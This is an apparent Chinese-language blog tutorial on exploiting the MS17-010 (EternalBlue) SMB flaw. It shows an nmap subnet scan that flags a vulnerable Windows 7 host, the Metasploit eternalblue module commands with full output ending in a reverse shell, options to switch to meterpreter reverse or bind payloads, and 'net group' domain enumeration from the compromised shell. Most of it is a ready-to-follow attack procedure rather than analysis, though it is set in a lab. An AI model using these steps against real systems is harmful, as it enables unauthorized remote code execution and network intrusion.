目录

• 利用Nmap检测
• MSF反弹SHELL
  • 注意
  • 乱码
• 参考

---

利用Nmap检测

命令：

nmap -p445 --script smb-vuln-ms17-010 [IP]

# 如果运行报错，可以加个sudo

IP/24 = 8位地址范围，对应的子网掩码简单理解：

ip/24
11111111 11111111 11111111 00000000
2^8=256-2=254（台）

ip/16
11111111 11111111 00000000 00000000
2^16=65536-2=65534（台）

ip/8
11111111 00000000 00000000 00000000
2^24=16777216-2=16777214（台）

打印结果：

x.x.x.x/24 = x.x.x.1~255

root@liuwx:~# nmap -p445 --script smb-vuln-ms17-010 192.168.119.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-10 21:10 CST
Nmap scan report for 192.168.119.1
Host is up (0.00053s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.119.2
Host is up (0.00014s latency).

PORT    STATE  SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:50:56:E0:1A:4E (VMware)

Nmap scan report for 192.168.119.139
Host is up (0.00024s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:BF:20:28 (VMware)

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap scan report for 192.168.119.254
Host is up (0.00067s latency).

PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:50:56:EF:68:01 (VMware)

Nmap scan report for 192.168.119.136
Host is up (0.000033s latency).

PORT    STATE  SERVICE
445/tcp closed microsoft-ds

Nmap done: 256 IP addresses (5 hosts up) scanned in 2.46 seconds

从报告结果可以看出，内网中192.168.119.139这台主机存在ms-17-010漏洞；

MSF反弹SHELL

命令

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 【IP】
run

打印结果：

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.119.136:4444
[+] 192.168.119.139:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.119.139:445 - Connecting to target for exploitation.
[+] 192.168.119.139:445 - Connection established for exploitation.
[+] 192.168.119.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.119.139:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.119.139:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.119.139:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.119.139:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.119.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.119.139:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.119.139:445 - Sending all but last fragment of exploit packet
[*] 192.168.119.139:445 - Starting non-paged pool grooming
[+] 192.168.119.139:445 - Sending SMBv2 buffers
[+] 192.168.119.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.119.139:445 - Sending final SMBv2 buffers.
[*] 192.168.119.139:445 - Sending last fragment of exploit packet!
[*] 192.168.119.139:445 - Receiving response from exploit packet
[+] 192.168.119.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.119.139:445 - Sending egg to corrupted connection.
[*] 192.168.119.139:445 - Triggering free of corrupted buffer.
[*] Command shell session 4 opened (192.168.119.136:4444 -> 192.168.119.139:49169) at 2019-10-10 21:14:11 +0800
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>

利用永恒之蓝成功！但返回的只是一个cmdshell ;

因为msf默认用的paylaod是：payload/windows/x64/shell/reverse_tcp

我们可以设置成其他payload: set payload windows/x64/meterpreter/reverse_tcp

只要设置rhosts和rport就OK了;

exploit 运行，这个时候就反弹的就是一个meterpreter会话 （更强的payload）。

使用正向的payload也是可以的：set payload windows/x64/meterpreter/bind_tcp

有ms17_010漏洞的主机，一般都是旧版windows系统的主机，用攻击模块的时候，可能会导致主机的蓝屏宕机，所以需要谨慎一些。

有乱码都是因为编码不一致造成的；

成因：

• Linux下面汉字默认是UTF-8编码
• Windows下汉字使用的是GBK系列编码

解决方案：

• Kali下先勾选GBK编码

  C:\Windows\system32>net group
  net group

  \ �����ʻ�

  ---

  *DnsUpdateProxy
  *Domain Admins
  *Domain Computers
  *Domain Controllers
  *Domain Guests
  *Domain Users
  *Enterprise Admins
  *Enterprise Read-only Domain Controllers
  *Group Policy Creator Owners
  *Read-only Domain Controllers
  *Schema Admins
  ����������ϣ�������һ��������

  chcp 65001

  C:\Windows\system32>net group
  net group

  Group Accounts for \

  ---

  *DnsUpdateProxy
  *Domain Admins
  *Domain Computers
  *Domain Controllers
  *Domain Guests
  *Domain Users
  *Enterprise Admins
  *Enterprise Read-only Domain Controllers
  *Group Policy Creator Owners
  *Read-only Domain Controllers
  *Schema Admins
  The command completed with one or more errors.

参考

https://cloud.tencent.com/developer/article/1541123

https://www.sqlsec.com/2018/03/smb.html